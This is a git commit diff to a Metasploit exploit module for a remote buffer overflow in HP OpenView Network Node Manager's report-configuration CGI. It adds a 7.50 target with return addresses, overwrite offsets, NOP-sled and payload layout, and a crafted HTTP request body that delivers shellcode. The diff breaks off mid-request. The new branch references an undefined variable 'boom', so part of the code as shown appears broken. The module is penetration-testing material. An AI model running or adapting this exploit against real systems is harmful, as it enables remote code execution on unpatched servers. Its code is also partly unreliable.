Added target 7.50, provided by MC

git-svn-id: file:///home/svn/framework3/trunk@12122 4d416f70-5f16-0410-b530-b9f4589650da
2011-03-24 02:48:04 +00:00 · 2011-03-24 02:48:04 +00:00 · a05866385f
parent d9dd2a3058
commit a05866385f
1 changed files with 57 additions and 22 deletions
--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
@ -31,6 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author'      =>
 				[
 					'sinn3r',
+					'MC',
 				],
 			'References' =>
 				[
@ -39,7 +40,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'	 =>
 				{
-					'BadChars' => "\x00\x26\x2b",
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'StackAdjustment' => -3500,
 				},
 			'DefaultOptions' =>
 				{
@ -49,36 +51,69 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform' => 'win',
 			'Targets'  =>
 				[
-					['Windows Server 2003 Enterprise', {'Ret'=>0x5A30532D, 'offset'=>46913, 'Pops'=>13, 'Payloadoffset'=>57} ],
+					[
+						'HP NNM 7.53 Windows Server 2003 Enterprise',
+						{
+							'Ret' => 0x5A30532D,    #POP/POP/RET OvWww.dll
+							'offset' => 46913,      #Offset to SEH chain
+							'Pops' => 13,           #Number of POPADs needed
+							'Payloadoffset' => 57,  #Offset to pyload
+						}
+					],
+					[
+						'HP OpenView Network Node Manager 7.50',
+						{
+							'Ret' => 0x5a01d78d,   #JMP
+							'offset' => 5117,      #Offset to overwrite EIP
+						}
+					],
 				],
 			'Privileged'     => false,
-			'DisclosureDate' => "JAN 10 2011"))
+			'DisclosureDate' => "Jan 10 2011"))

-			register_options(
-				[
-					Opt::RPORT(80),
-				], self.class)
+			register_options( [Opt::RPORT(80),], self.class )
 	end

 	def exploit

-		nops = make_nops(1000)*70
+		sploit = ''
+		data   = ''

-		sploit  = nops[0, target['offset']]
-		sploit << generate_seh_record(target.ret)
-		sploit << "\x61"*target['Pops']
-		sploit << "\x51"
-		sploit << "\xc3"
-		sploit << nops[0, target['Payloadoffset']]
-		sploit << payload.encoded
-		sploit << nops[0, 70000-sploit.length]
+		if target.name =~ /NNM 7.53/ && target.name =~ /Server 2003/

-		data  = "Content&Action=Create&"
-		data << "Template=Avail/CRAvail&"
-		data << "Operation=Apply&"
-		data << "Params=schdParams+nameParams"
-		data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&"
-		data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1"
+			nops = make_nops(1000)*70
+
+			sploit << nops[0, target['offset']]
+			sploit << generate_seh_record(target.ret)
+			sploit << "\x61"*target['Pops']
+			sploit << "\x51"
+			sploit << "\xc3"
+			sploit << nops[0, target['Payloadoffset']]
+			sploit << payload.encoded
+			sploit << nops[0, 70000-sploit.length]
+
+			data << "Content&Action=Create&"
+			data << "Template=Avail/CRAvail&"
+			data << "Operation=Apply&"
+			data << "Params=schdParams+nameParams"
+			data << "&schdParams=schd_select1%3Ddaily%7Cmonthtodate&"
+			data << "nameParams=text1%3D#{sploit}%26text2%3Dtest2test%26text3%3Dtest2 HTTP/1.1"
+
+		elsif target.name =~ /7.50/
+
+			#Courtersy of MC
+			sploit << rand_text_alpha_upper(target['offset'])
+			sploit << [target.ret].pack('V')
+			sploit << payload.encoded
+			sploit << rand_text_alpha_upper(8024 - 5117 - 4 - payload.encoded.length)
+
+			data << "Content&Action=Modify&Template=Avail/General+Availabiilty/monthtodat"
+			data << "e&Operation=Apply&Params=schdParams+nameParams&schdParams=schd_select1%3Dmonto"
+			data << "date&nameParams=text1%3D#{boom}%262%3D%263%3D"
+
+		end
+
+		print_status("Trying target #{target.name}...")

 		connect
 		send_request_raw({